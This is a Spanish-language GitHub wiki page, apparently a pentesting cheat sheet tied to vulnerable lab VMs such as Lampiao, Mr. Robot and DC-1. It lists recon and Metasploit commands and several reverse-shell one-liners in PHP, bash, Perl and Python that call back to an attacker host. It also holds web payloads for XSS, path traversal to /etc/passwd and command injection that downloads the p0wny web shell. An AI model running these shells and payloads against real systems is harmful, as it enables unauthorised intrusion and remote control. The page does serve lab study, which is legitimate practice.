-
Notifications
You must be signed in to change notification settings - Fork 1
Home
En este apartado se detallara el procedimiento aplicado para realizar el pentesting en cada VM:
- VM Lampiao - Drupal 32 bits
- VM Toppo - 32 bits
- Basic pentesting 1
- Basic pentesting 2
- Blacklight
- Derpstink
- typhoon
- diana
- lazysysadmin
- Quaoar
- covfefe
- fowsniff
- Droopy
- vancouver
- SecTalks: BNE0x03 - Simple
- Fristileaks
- lin.security1
- bulldog
- mr.robot
- raven
- stapler
- overthewire -> Bandit
- DC-1
- HackinIos
- Web Developer: 1
- Docker notsosecure.com
- replay
- eric-GitTools
- happycorp - john
- sputnik - splunk
- silky - export
- tips and tricks
- Crear wordlists de passwords
- RapidScan - remote - The Multi-Tool Web Vulnerability Scanner
- kernelpop - local
- Lynis - local - audit system UNIX
- unixs-privs-check - local
- exploit binaries unix - local
Muestras la información obtenida por SNMP de forma amigable
snmpcheck -t x.x.x.x
Primero tendremos que iniciar la BBD postgresql:
/etc/init.d/postgresql start
Ahora ya podemos entrar dentro de la consola:
msfconsole
Para buscar y utilizar un exploit:
search TEST
exploit TEST
Si queremos saber que variables podemos utilizar en el exploit:
info
SET RHOST x.x.x.x
Obtener información de un dominio desde diferentes motores de búsqueda:
theharvester -d test.com -l 200 -b google
Mostrar toda la información posible de un dominio:
dnsenum --enum test.com
Vulnerabilidades web
nikto -C all -host x.x.x.x
wpscan --url http://IP/ --enumerate p
wpscan --enumerate u --disable-tls-checks --url https://IP:12380/blogblog
Buscar archivos con SUID configurado:
find / -perm -u=s -type f 2>/dev/null
Maquina atacante:
nc -vlp 8080
Maquina victima
php -r '$sock=fsockopen("attackerip",8080);exec("/bin/sh -i <&3 >&3 2>&3");'`
bash -i >& /dev/tcp/attackerip/8080 0>&1`
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
perl -e 'use Socket;$i="172.31.255.142";$p=8085;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerIP",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Una vez obtenida la shell:
python -c 'import pty;pty.spawn("/bin/bash")'
<Ctrl+z> bg
stty raw -echo
fg
reset
Pruebas extraídas de la web: https://pentesterlab.com/exercises/web_for_pentester
http://172.31.255.111/xss/example1.php?name=%3Cscript%3Ealert(%22HACKER%22)%3C/script%3E
http://172.31.255.111/fileincl/example1.php?page=../../../../etc/passwd
http://172.31.255.111/fileincl/example1.php?page=../../../../etc/passwd%00
http://xqi.cc/index.php?m=php://filter/convert.base64-encode/resource=index
http://172.31.255.111/commandexec/example1.php?ip=127.0.0.1|cat /etc/passwd
http://172.31.255.111/commandexec/example1.php?ip=127.0.0.1|wget –no-check-certificate https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php
http://172.31.255.111/commandexec/example2.php?ip=8.8.8.8%0aid